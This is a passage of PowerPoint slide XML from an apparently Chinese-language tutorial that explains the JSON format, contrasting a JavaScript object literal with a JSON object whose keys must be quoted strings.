            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479112" y="960483"/>
            <a:ext cx="10930568" cy="2695197"/>
            <a:chOff x="788949" y="1670879"/>
            <a:chExt cx="10930568" cy="2695197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="788949" y="1670879"/>
              <a:ext cx="10930568" cy="2695197"/>
              <a:chOff x="920208" y="1823315"/>
              <a:chExt cx="10718269" cy="2695197"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920208" y="1823316"/>
                <a:ext cx="10718269" cy="2695196"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 6189"/>
                  <a:gd name="adj2" fmla="val 6477"/>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04000" bIns="0" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="20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概念</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a:t>
                </a:r>
                <a:r>
                  <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ava</a:t>
                </a:r>
                <a:r>
                  <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cript </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN"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bject </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>Notation</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>，是一种轻量级的数据交换格式</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JSON </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就是个字符串文本</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格式和</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JS</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自定义对象类似</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只是属性名必须是双引号字符串形式。</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>它基于 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-GB" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>ECMAScript (</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>欧洲计算机协会制定的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>JS</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>规范</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>的一个子集，采用完全独立于</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>JS</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="181B29"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="ShidianHackSafariFont"/>
                  </a:rPr>
                  <a:t>的文本格式来存储和表示数据。</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74395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>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解析</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 </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是一种文本规范，</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74395" lvl="2" indent="-342900">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="+mj-ea"/>
                  <a:buAutoNum type="circleNumDbPlain"/>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由于其语法简单，层次结构鲜明，现多用于作为数据载体，在网络中进行数据传输。</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对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823315"/>
                <a:ext cx="1609593" cy="431800"/>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JSON</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5" name="Shape 2375"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1003427" y="1745015"/>
              <a:ext cx="228197" cy="279459"/>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bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:noFill/>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solidFill>
                  <a:srgbClr val="F4B246"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="!!矩形: 圆角 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788950" y="3660179"/>
            <a:ext cx="2733183" cy="1448735"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3261"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>
          </a:solidFill>
          <a:ln w="635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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Tom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    age:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gender:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"male</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>没有要求</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!矩形: 圆角 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788949" y="5187119"/>
            <a:ext cx="2733184" cy="1448735"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3261"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFE4"/>
          </a:solidFill>
          <a:ln w="635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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Tom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"age"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gender"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"male</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>};     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>对象</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>必须是字符串</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5193665" y="5162351"/>
            <a:ext cx="4854013" cy="854530"/>
            <a:chOff x="5405105" y="5189611"/>
            <a:chExt cx="4574165" cy="854686"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="图片 11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5405105" y="5302005"/>
              <a:ext cx="673469" cy="683311"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="13" name="直接箭头连接符 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6189785" y="5477608"/>
              <a:ext cx="3789485" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1905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7"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6189785" y="5758962"/>
              <a:ext cx="3789485" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1905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841512" y="5189611"/>
              <a:ext cx="486030" cy="275640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="12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请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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文本框 15"/>
